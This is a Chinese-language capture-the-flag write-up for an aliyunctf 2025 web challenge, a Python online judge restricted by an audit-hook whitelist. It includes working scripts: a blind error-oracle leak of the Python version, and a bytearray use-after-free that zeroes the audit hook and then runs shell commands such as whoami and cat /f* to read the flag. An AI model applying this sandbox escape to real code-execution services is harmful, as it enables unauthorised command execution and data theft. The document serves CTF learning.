(这是一道来自aliyunctf_2025的web题目,这几天复现了一遍,感觉挺有意思,于是记录一下)
题目描述:

题目分析:
提供了一个链接,打开可以看到是一个oj系统,能上传运行自己编写的解题程序,返回AC,WA等判断结果:
然后在页面下方可以看到有一行提示,view source at /source,访问/source拿到源码:
import os
import subprocess
import uuid
import json
from flask import Flask, request, jsonify, send_file
from pathlib import Path
app = Flask(__name__)
SUBMISSIONS_PATH = Path("./submissions")
PROBLEMS_PATH = Path("./problems")
SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True)
CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect
def audit_checker(event,args):
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
raise RuntimeError
sys.addaudithook(audit_checker)
"""
class OJTimeLimitExceed(Exception):
pass
class OJRuntimeError(Exception):
pass
@app.route("/")
def index():
return send_file("static/index.html")
@app.route("/source")
def source():
return send_file("server.py")
@app.route("/api/problems")
def list_problems():
problems_dir = PROBLEMS_PATH
problems = []
for problem in problems_dir.iterdir():
problem_config_file = problem / "problem.json"
if not problem_config_file.exists():
continue
problem_config = json.load(problem_config_file.open("r"))
problem = {
"problem_id": problem.name,
"name": problem_config["name"],
"description": problem_config["description"],
}
problems.append(problem)
problems = sorted(problems, key=lambda x: x["problem_id"])
problems = {"problems": problems}
return jsonify(problems), 200
@app.route("/api/submit", methods=["POST"])
def submit_code():
try:
data = request.get_json()
code = data.get("code")
problem_id = data.get("problem_id")
if code is None or problem_id is None:
return (
jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
400,
)
problem_id = str(int(problem_id))
problem_dir = PROBLEMS_PATH / problem_id
if not problem_dir.exists():
return (
jsonify(
{"status": "ER", "message": f"Problem ID {problem_id} not found!"}
),
404,
)
code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
with open(code_filename, "w") as code_file:
code = CODE_TEMPLATE + code
code_file.write(code)
result = judge(code_filename, problem_dir)
code_filename.unlink()
return jsonify(result)
except Exception as e:
return jsonify({"status": "ER", "message": str(e)}), 500
def judge(code_filename, problem_dir):
test_files = sorted(problem_dir.glob("*.input"))
total_tests = len(test_files)
passed_tests = 0
try:
for test_file in test_files:
input_file = test_file
expected_output_file = problem_dir / f"{test_file.stem}.output"
if not expected_output_file.exists():
continue
case_passed = run_code(code_filename, input_file, expected_output_file)
if case_passed:
passed_tests += 1
if passed_tests == total_tests:
return {"status": "AC", "message": f"Accepted"}
else:
return {
"status": "WA",
"message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
}
except OJRuntimeError as e:
return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
except OJTimeLimitExceed:
return {"status": "TLE", "message": "Time Limit Exceed"}
def run_code(code_filename, input_file, expected_output_file):
with open(input_file, "r") as infile, open(
expected_output_file, "r"
) as expected_output:
expected_output_content = expected_output.read().strip()
process = subprocess.Popen(
["python3", code_filename],
stdin=infile,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True,
)
try:
stdout, stderr = process.communicate(timeout=5)
except subprocess.TimeoutExpired:
process.kill()
raise OJTimeLimitExceed
if process.returncode != 0:
raise OJRuntimeError(process.returncode)
if stdout.strip() == expected_output_content:
return True
else:
return False
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)
观察一下源码,整个程序的流程大概就是,先把CODE_TEMPLATE与用户上传的代码拼接在一起然后执行,之后将输出的内容与参考答案进行比较,返回AC,WA等结果。由于题目描述中提到这个题目环境不出网,所以可以猜测应该是要想办法执行命令,然后通过延时或者布尔的方式把返回值带出来。 摸清楚方向,接下来我们先仔细观察一下这个oj系统对代码执行做了什么限制,先看看CODE_TEMPLATE里写了什么:
import sys
import math
import collections
import queue
import heapq
import bisect
def audit_checker(event,args):
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
raise RuntimeError
sys.addaudithook(audit_checker)
可以看到这段代码使用audit hook设置了一些白名单: "import", "time.sleep", "builtins.input", "builtins.input/result"
audit hook是 Python 3.8 引入的一个安全功能,audit hook机制允许注册一个回调函数,当特定事件发生时(如导入模块、执行系统命令等),这个回调函数会被调用,并接收事件名称和参数信息。具体到这段代码里,如果发生的事件不在白名单中,就会抛出 RuntimeError 异常,中止程序执行。
关于Audit events的含义可以查阅这篇文档
我们在本地拿os.system测试一下:
import sys
def audit_checker(event,args):
if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
raise RuntimeError('Operation not permitted: {}'.format(event))
sys.addaudithook(audit_checker)
import os
try:
os.system('whoami')
except RuntimeError as e:
print(e)
输出:
可以看到因为os.system不在白名单内,程序抛出了一个RuntimeError异常,终止执行。 所以如果要执行命令,我们就要先绕过audit hook的限制。 具体怎么绕呢?这玩意是个白名单,不太可能直接绕过,所以应该有一些其他的技巧。搜索github可以找到这个项目, 他的原理大概就是利用python的一个UAF漏洞,把审计钩子的内存位置清零,从而禁用它们,非常的牛逼。虽然作为一名菜鸡web手确实不是很懂这玩意的细节,不过对着poc利用还是做得到的。 这个项目,首先,因为python版本不同审计钩子的偏移量也不同,所以我们需要先拿到服务器运行的python的版本,才能进一步利用,或者判断到底有没有利用的可能性。这里使用sys.version配合回显判断版本号:
import requests
import time
BASE_URL = "http://ip:port"
SUBMIT_URL = f"{BASE_URL}/api/submit"
def submit_code(code, problem_id=1):
data = {
"code": code,
"problem_id": problem_id
}
response = requests.post(SUBMIT_URL, json=data)
return response.json()
def test_version_char(pos, char):
payload = f"""
import sys
ver = sys.version
if ver[{pos}] == '{char}':
1/0
"""
result = submit_code(payload)
return result.get("status") == "RE"
def extract_version():
found = ""
for pos in range(10):
for char in "0123456789.-+ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ":
if test_version_char(pos, char):
found += char
print(f"Found character at position {pos}: {char}")
print(f"Current version string: {found}")
break
time.sleep(0.1)
return found
if __name__ == "__main__":
print("Starting Python version extraction...")
version = extract_version()
print(f"Extracted version string: {version}")
最终结果:
3.12.9,确实可以利用,这下就简单了,照着打就行了,结合payload稍微改一下之前的脚本:
import requests
import time
BASE_URL = "http://121.41.238.106:61085"
SUBMIT_URL = f"{BASE_URL}/api/submit"
def submit_code(code, problem_id=1):
data = {
"code": code,
"problem_id": problem_id
}
response = requests.post(SUBMIT_URL, json=data)
return response.json()
def test_version_char(pos, char):
payload = f"""
import os
class UAF:
def __index__(self):
global memory
uaf.clear()
memory = bytearray()
uaf.extend([0] * 56)
return 1
uaf = bytearray(56)
uaf[23] = UAF()
PTR_OFFSET = [24, 48, 0x46890]
getptr = lambda func: int(str(func).split("0x")[-1].split(">")[0], 16)
ptr = getptr(os.system.__init__) + PTR_OFFSET[0]
ptr = int.from_bytes(memory[ptr:ptr + 8], 'little') + PTR_OFFSET[1]
res = int.from_bytes(memory[ptr:ptr + 8], 'little') + PTR_OFFSET[2]
memory[res:res + 8] = [0] * 8
out = os.popen('whoami').read()
if out[{pos}] == '{char}':
1/0
"""
result = submit_code(payload)
return result.get("status") == "RE"
def extract_version():
found = ""
for pos in range(50):
for char in "0123456789.-+ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ/}{":
if test_version_char(pos, char):
found += char
print(f"Found character at position {pos}: {char}")
print(f"Current string: {found}")
break
time.sleep(1)
return found
if __name__ == "__main__":
print("Starting extraction...")
version = extract_version()
print(f"Extracted string: {version}")
成功拿到 whoami 命令执行结果:
修改命令为 ls /f* 看到flag文件名应该是flag-xxxx的形式
直接 cat /f* 就可以得到flag 
